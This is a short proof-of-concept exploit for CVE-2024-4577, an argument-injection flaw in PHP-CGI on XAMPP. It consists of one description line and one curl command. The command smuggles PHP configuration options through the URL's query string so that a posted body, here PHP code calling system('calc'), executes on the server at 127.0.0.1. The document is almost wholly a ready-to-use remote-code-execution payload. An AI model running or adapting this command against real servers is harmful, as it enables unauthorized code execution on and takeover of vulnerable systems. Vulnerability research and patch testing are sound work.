
Proof-of-concept exploit for CVE-2024-4577 targeting XAMPP PHP-CGI with remote code execution via argument injection.
curl -v -d "<?php system('calc'); ?>" http://127.0.0.1/php-cgi/php-cgi.exe/?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0